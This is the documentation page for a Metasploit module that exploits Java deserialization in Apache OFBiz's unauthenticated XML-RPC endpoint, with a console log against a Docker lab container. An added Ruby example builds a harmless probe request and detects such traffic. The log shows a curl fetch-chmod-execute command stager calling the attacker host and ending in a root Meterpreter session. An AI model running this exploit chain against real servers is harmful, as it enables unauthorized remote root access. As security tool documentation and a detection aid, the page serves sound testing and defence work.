metasploit-gs/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md (2020-08-14 21:46:34 -05:00)

## Vulnerable Application

### Description

This module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated XML-RPC endpoint `/webtools/control/xmlrpc` in versions prior to 17.12.04. The endpoint is served by Apache XML-RPC with its extensions enabled, so a `<serializable>` parameter (a base64-encoded Java serialization stream) is deserialized by the server before the method call is dispatched. No credentials are required; the module's automatic check reports `Target can deserialize arbitrary data` when the endpoint accepts such input.
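The request shape described above, as an added example that is not part of the module or of the OFBiz project: it builds a `methodCall` whose parameter is a harmless serialized Java `String` in the Apache XML-RPC `<ex:serializable>` extension type (the same parameter type the module fills with a gadget chain), and runs a detector over constructed sample requests that flags a `<serializable>` parameter whose base64 content starts with the Java serialization stream header `AC ED 00 05`. The endpoint path comes from the page; the extension namespace, the stream header and the `TC_STRING` layout are Java and Apache XML-RPC facts; the sample traffic, the method name `probe` and every function name are assumptions made for this example.

```ruby
# Added example (not module or OFBiz code): build an XML-RPC <serializable>
# request with a harmless Java object, and detect such requests in captured
# traffic. Uses only core Ruby (pack/unpack for base64, a regex for the body).

# Endpoint from the module description.
OFBIZ_XMLRPC_PATH = '/webtools/control/xmlrpc'
# Every Java serialization stream opens with STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005.
JAVA_SERIAL_MAGIC = "\xAC\xED\x00\x05".b
# Apache XML-RPC extension namespace that defines the <ex:serializable> type.
XMLRPC_EXT_NS = 'http://ws.apache.org/xmlrpc/namespaces/extensions'

# Java serialization of a plain String: stream header, TC_STRING (0x74),
# 2-byte big-endian length, then the bytes (ASCII only here; Java uses
# modified UTF-8, which differs for NUL and non-BMP characters).
def java_serialized_string(str)
  bytes = str.b
  unless bytes.ascii_only? && bytes.bytesize <= 0xFFFF
    raise ArgumentError, 'non-ASCII or too long for TC_STRING'
  end
  JAVA_SERIAL_MAGIC + "\x74".b + [bytes.bytesize].pack('n') + bytes
end

# XML-RPC methodCall whose single parameter is a base64 Java object in the
# <ex:serializable> extension type. The method name is irrelevant: a server
# that accepts the extension deserializes the parameter before dispatch.
def xmlrpc_serializable_request(method_name, serialized_bytes)
  b64 = [serialized_bytes].pack('m0')
  <<~XML
    <?xml version="1.0"?>
    <methodCall xmlns:ex="#{XMLRPC_EXT_NS}">
      <methodName>#{method_name}</methodName>
      <params>
        <param><value><ex:serializable>#{b64}</ex:serializable></value></param>
      </params>
    </methodCall>
  XML
end

# Matches the element with or without a namespace prefix (ex:serializable).
SERIALIZABLE_RE = %r{<(?:\w+:)?serializable\b[^>]*>(.*?)</(?:\w+:)?serializable>}m

# Classify one captured request (a hash with :method, :path, :body).
# Returns nil for benign traffic, otherwise a one-line reason.
def detect_ofbiz_deser_attempt(request)
  return nil unless request[:method] == 'POST'
  return nil unless request[:path].to_s.split('?', 2).first == OFBIZ_XMLRPC_PATH
  m = SERIALIZABLE_RE.match(request[:body].to_s)
  return nil unless m
  blob = m[1].gsub(/\s+/, '')
  decoded = begin
    blob.unpack1('m0') # strict base64: raises on malformed input
  rescue ArgumentError
    return 'serializable element with non-base64 content'
  end
  if decoded.start_with?(JAVA_SERIAL_MAGIC)
    "Java serialization stream (#{decoded.bytesize} bytes) in <serializable> parameter"
  else
    'serializable parameter without Java stream header'
  end
end

# Constructed sample traffic: a deserialization probe, a legitimate XML-RPC
# call to the same endpoint, and an unrelated page fetch.
SAMPLE_REQUESTS = [
  { method: 'POST', path: OFBIZ_XMLRPC_PATH,
    body: xmlrpc_serializable_request('probe', java_serialized_string('hello')) },
  { method: 'POST', path: OFBIZ_XMLRPC_PATH,
    body: '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName><params/></methodCall>' },
  { method: 'GET', path: '/webtools/control/main', body: '' }
].freeze

def scan(requests)
  requests.map { |r| detect_ofbiz_deser_attempt(r) }
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_REQUESTS).each_with_index { |v, i| puts "request #{i}: #{v || 'clean'}" }
end
```

Running the file prints one verdict per sample request. The body scan is a regex rather than a full XML parse because that is what a WAF or IDS rule would do over raw request bodies; it also catches the element when it appears without the `ex:` prefix. Only the first sample is flagged, because a legitimate XML-RPC call never carries a `<serializable>` parameter.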

### Setup

You can use https://hub.docker.com/r/opensourceknight/ofbiz. The scenario below targets the container's HTTPS listener from the Docker host (`RHOSTS 127.0.0.1`, `RPORT 8443`, `SSL true`), so publish port 8443 to the host when starting the container.

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios): start the container, set `RHOSTS` and `LHOST`, and run the module. The automatic check should report that the target is vulnerable, and a session should open as `root` inside the container.

## Targets

### 0

Unix Command: executes a `cmd/unix` command payload directly through the deserialization sink.

### 1

Linux Dropper: uses a command stager to fetch a native Linux payload from the module's HTTP server (`SRVPORT`) with `curl`, mark it executable, run it, and delete it, as the scenario below shows. The target therefore needs outbound HTTP access to the attacking host.

## Scenarios

### Apache OFBiz from Docker

```
msf6 > use exploit/linux/http/apache_ofbiz_deserialiation
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > options

Module options (exploit/linux/http/apache_ofbiz_deserialiation):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set srvport 8888
srvport => 8888
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run

[*] Started HTTPS reverse handler on https://192.168.1.7:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
[*] Using URL: http://0.0.0.0:8888/68JL1QQv9
[*] Local IP: http://10.3.227.250:8888/68JL1QQv9
[*] Generated command stager: ["curl -so /tmp/hPNJksUw http://192.168.1.7:8888/68JL1QQv9", "chmod +x /tmp/hPNJksUw", "/tmp/hPNJksUw", "rm -f /tmp/hPNJksUw"]
[*] Executing command: curl -so /tmp/hPNJksUw http://192.168.1.7:8888/68JL1QQv9
[*] Client 192.168.1.7 (curl/7.38.0) requested /68JL1QQv9
[*] Sending payload to 192.168.1.7 (curl/7.38.0)
[+] Successfully executed command: curl -so /tmp/hPNJksUw http://192.168.1.7:8888/68JL1QQv9
[*] Command Stager progress -  50.91% done (56/110 bytes)
[*] Executing command: chmod +x /tmp/hPNJksUw
[+] Successfully executed command: chmod +x /tmp/hPNJksUw
[*] Command Stager progress -  70.91% done (78/110 bytes)
[*] Executing command: /tmp/hPNJksUw
[+] Successfully executed command: /tmp/hPNJksUw
[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: frnipk1q) Redirecting stageless connection from /aJ9UMsgiAwtcxlrEA_FZgALC4Hv1lB7J6FYYuxOIHgIqCwYB7mObrp856SohhGkVPq with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: frnipk1q) Redirecting stageless connection from /aJ9UMsgiAwtcxlrEA_FZgAbFBH7l4OT-5iFaTB63j with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: frnipk1q) Attaching orphaned/stageless session...
[*] Command Stager progress -  82.73% done (91/110 bytes)
[*] Executing command: rm -f /tmp/hPNJksUw
[+] Successfully executed command: rm -f /tmp/hPNJksUw
[*] Meterpreter session 1 opened (192.168.1.7:8443 -> 192.168.1.7:55439) at 2020-08-14 16:42:30 -0500
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root @ 298e7fba3ec9 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 8.4 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```